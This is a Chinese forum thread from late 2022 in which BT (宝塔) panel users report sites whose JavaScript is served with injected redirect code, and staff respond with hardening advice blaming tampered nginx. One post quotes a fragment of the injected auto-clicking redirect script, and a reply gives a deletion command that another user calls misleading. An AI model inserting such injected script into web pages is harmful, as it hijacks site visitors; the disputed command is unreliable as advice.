【已完成】【非标题党】宝塔严重未知安全性漏洞

本帖最后由堡塔运维香菜卷于 2023-3-23 15:56 编辑

论坛已经很多人反馈了，具体内容参考loc
https://hostloc.com/forum.php?mod=viewthread&tid=1111691&extra=page%3D2&mobile=2

今天有个朋友的js都被加了一段劫持代码，
经过检查发现实际文件不存在劫持js代码，但是访问有，晚上的时候论坛出现好几例被挂马，数据异常，异地登录的反馈

下午给url加上随机数，劫持js消失，疑似缓存被篡改，但是原服务器没有安装任何除nginx php mysql之外的插件

检查了nginx配置文件，伪静态，都没能检查出问题。
可以确认就是宝塔的问题，因为朋友的那台机器根本没有任何web篡改的迹象，并且文件检查都是正常的。

Screenshot_2022-12-08-19-26-20-038_com.tencent.mm.jpg

Screenshot_2022-12-08-19-26-20-038_com.tencent.mm.jpg

谢花郎 · 发表于 2022-12-8 19:51:58

您好，如果您那边有机器的话，可通过论坛私信联系我您信息，这边可协助您排查

宝塔用户_wbidlm · 发表于 2022-12-8 20:28:37

一台服务器昨天莫名奇妙被人登录了宝塔，有点奇怪，就是最*几天，只能先关了面板，用得时候再ssh连上开启

樱落丶未央 · 发表于 2022-12-8 20:42:34

宝塔用户_wbidlm 发表于 2022-12-8 20:28
一台服务器昨天莫名奇妙被人登录了宝塔，有点奇怪，就是最*几天，只能先关了面板，用得时候再ssh连上开启 ...

管用吗这样我也是关闭了

宝塔用户_wbidlm · 发表于 2022-12-8 20:56:01

樱落丶未央发表于 2022-12-8 20:42
管用吗这样我也是关闭了

一直用得ssh密钥登录，只开放了业务端口，之前服务器被人黑过几次，最后都是找到是php版本漏洞，这次排查了一下，怎么都找不到问题，感觉是宝塔得问题，毕竟开源被人研究出来漏洞很正常；这个人登录我得服务器就上来find 程序代码，感觉像是来挂码得

桥哥 · 发表于 2022-12-8 21:19:10

感谢反馈，当前有个别用户反馈被挂马的情况，我们正在全力排查中，暂时未发现面板存在有安全漏洞的风险。如果您担心面板存在风险，可以登录终端执行bt stop命令停止面板服务，停止面板服务不会影响您网站的正常运行。

宝塔用户_jdqmcs · 发表于 2022-12-8 23:08:34

桥哥发表于 2022-12-8 21:19
感谢反馈，当前有个别用户反馈被挂马的情况，我们正在全力排查中，暂时未发现面板存在有安全漏洞的风险。如 ...

您好，请问从新启用的命令是什么，谢谢

不明 · 发表于 2022-12-8 23:36:16

桥哥发表于 2022-12-8 21:19
感谢反馈，当前有个别用户反馈被挂马的情况，我们正在全力排查中，暂时未发现面板存在有安全漏洞的风险。如 ...

https://hostloc.com/thread-1111691-1-1.html

宝塔用户_jejhqk · 发表于 2022-12-9 00:08:00

装有wordpress
apache,nginx都一样
使用移动UA，访问HTTP，非HTTPS。
JS文件被插入代码
(function(){var e=document,c=e.createElement("a");c.,e.body.appendChild(c),c.click()})()
不是每次都插入，还IP清除缓存基本第一次都会被插入。
空网站目录依然跳转。

xiaobo9299556 · 发表于 2022-12-9 09:11:49

宝塔用户_jdqmcs 发表于 2022-12-8 23:08
您好，请问从新启用的命令是什么，谢谢

rm -f /www/server/panel/data/close.pl

宝塔用户_dgnbpt · 发表于 2022-12-9 09:27:52

xiaobo9299556 发表于 2022-12-9 09:11
rm -f /www/server/panel/data/close.pl

qnmd 误导人家是吧

宝塔用户_jdqmcs · 发表于 2022-12-9 15:55:24

宝塔用户_dgnbpt 发表于 2022-12-9 09:27
qnmd 误导人家是吧

没事的谢谢官哥已经回复了：bt restart

dwtonline · 发表于 2022-12-13 13:35:31

谢花郎发表于 2022-12-8 19:51
您好，如果您那边有机器的话，可通过论坛私信联系我您信息，这边可协助您排查 ...

你好，感谢您的回复。客户听说已经联系你们了，但是似乎也没得到一个肯定的答和修复方案。目前公司这边所有宝塔全部下线了，前几天忙着转移数据去了。我个人还是希望继续使用宝塔。

桥哥 · 发表于 2022-12-13 15:17:32

dwtonline 发表于 2022-12-13 05:35
你好，感谢您的回复。客户听说已经联系你们了，但是似乎也没得到一个肯定的答和修复方案。目前公司这边所 ...

因Nginx被篡改导致网站被挂马，联系我们客服，免费跟进处理，联系方式电话：0769-23030556，或QQ：1021266737

当前还在统计样本中，目前是少部分用户的海外机器被挂马，经分析，非大面积服务器被挂马，因挂马的服务器日志被清空了，分析溯源需要点时间。我们已排查了所有节点服务器，校对了文件MD5值，无异常。感谢支持，对于挂马事情给您造成的影响，深感抱歉。

宝塔面板中可以做出下面的措施进行网站、面板、服务器加固：
1、升级面板到最新版，已经是最新版的，在首页修复面板，修改安全入口及修改账号密码，开启动态口令认证（增强安全性）
2、nginx升级到当前主版本号的最新子版本，如1.22.0升级到1.22.1，已经是最新版的，请卸载重装
3、因生产需要暂时无法升级面板或nginx的，开启动态口令认证，有条件的设置授权IP
5、【企业版防篡改-重构版】插件可以有效防止网站被篡改，建议开启并设置root用户禁止修改文件（需要使用时再放开），另外，将nginx关键执行目录（/www/server/nginx/sbin）锁住
6、【宝塔系统加固】插件中的【关键目录加固】功能，可以将nginx关键执行目录（/www/server/nginx/sbin）锁住，此目录在正常使用中不会有任何修改的行为，除了重装以外其他修改行为均可视为被篡改，所以将它锁上。

宝塔用户_zbaaud · 发表于 2022-12-24 19:26:16

确实有不少我之前也被挂马了，静态网站

█ 菠萝云-免费装宝塔,4G内存68 █	速智云-高性能高防服务器/五折起	★香港CN2云/站群/高防/特价机★	【个人信息保护的调研问卷】	【多途云】高防CDN
高防服务器，无视一切流量攻击	A7招租，联系qq394030111	OV/EV SSL证书，可当日签发	【阿里云】宝塔一键部署，5.5折	宝塔一键部署DV,EV,OV,SSL证书
█ 易探云·香港/美国vps仅9元 █	高防CDN全球节点99元\|服务器29元	★香港VPS首月免费★续费68元★	【阿里云】2核2G，3M，45.1元/年	在线网站测速、批量PING运维工具